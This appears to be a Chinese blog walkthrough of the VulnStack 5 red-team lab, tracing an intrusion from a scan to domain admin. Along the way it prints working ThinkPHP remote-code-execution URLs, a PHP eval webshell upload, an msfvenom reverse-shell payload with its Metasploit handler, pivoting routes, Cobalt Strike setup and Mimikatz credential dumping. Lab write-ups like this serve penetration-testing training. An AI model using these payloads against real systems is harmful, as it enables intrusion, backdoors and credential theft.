记录一次内网渗透过程，ATT&CK实战| VulnStack红队（五）靶场

在打开靶场之前先一句话给你干emo

             不必惋惜反正失去的东西从未属于你                                                                    

                                                                                                                                            ——阿喜

1.环境搭建

首先环境搭建，配置规则很简单，win7(有外网服务的服务器）可以通内网也可以通外网同时都能Ping通。

2.信息收集

通过ip扫描端口发现开放了80（http), 3306(mysql),通过对应的端口找对应的服务

tomcat--80/8080/8009 manager弱口令（漏洞利用可以上传war包getshell） put上传webshell HTTP慢速攻击 ajr文件包含漏洞-CVE-2020-1938

Mysql--3306 弱口令 身份认证漏洞-cve-2012-2122 拒绝服务攻击 phpmyadmin万能密码or弱口令 UDF/MOF提权

 访问目标IP地址随便接上路径，直接框架版本爆出来

 百度一下框架漏洞，一搜一大堆

然后漏洞的基本原理大致是这样的，Thinkphp是一个国内轻量级的开发框架。由于没有正确处理控制器名，导致在网站没有开启强制路由的情况下（即默认情况下）可以执行任意方法，从而导致远程命令执行漏洞。

3.通过框架漏洞getshell

网上百度一下超多poc

 随便找个poc一放直接回显成功

?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=phpinfo();

那我们下一步当然是直接上马getshell啊

上传马的poc为：

/?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=shell.php&vars[1][]=<?php @eval($_POST[x]);?>

 内网渗透

使用蚁剑进行连接，进行主机信息收集，发现该主机在域内，另一个IP为192.168.138.136。

 查看域控管理员ip为192.168.138.138。

使用kail中MSF生一个木马，上传到蚁剑上运行，将shell反弹到kali上

Msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.135.128 LPORT=7777  -f exe -o AX.exe

 

-p 设置payload，查看可以使用的payload可以使用命令(msfvenom -l payload)

-f 输出木马的格式(i.e. exe)

LHOST 本机IP

LPORT 本机端口

 通过蚁剑执行木马文件，在kali上面进行监听

use exploit/multi/handlerset payload windows/x64/meterpreter/reverse_tcp
set LHOST 192.168.135.128
set LPORT 7777
run

 搭建通往内网的路由

 run autoroute -s 192.168.138.0/24
run autoroute -p

 使用CS工具进行内网穿透

Cobalt Strike是一款超级好用的渗透测试工具，拥有多种协议主机上线方式，集成了提权，凭据导出，端口转发，socket代理，office攻击，文件捆绑，钓鱼等多种功能。同时，Cobalt Strike还可以调用Mimikatz等其他知名

将cs工具上传到kail作为服务端，修改Cobalt Strike配置文件teamserver为端口号为6666

本地开启6666端口

现在启动服务端 

./teamserver (kali的IP) 123(cs服务密码后面连接需要用)

打开本机客户端连接上去

 

选择我们刚刚创建监听的主机。保存木马文件通过蚁剑进行上传执行 

通过蚁剑执行并得到回显

 

运行Mimikatz得到域管理员账户密码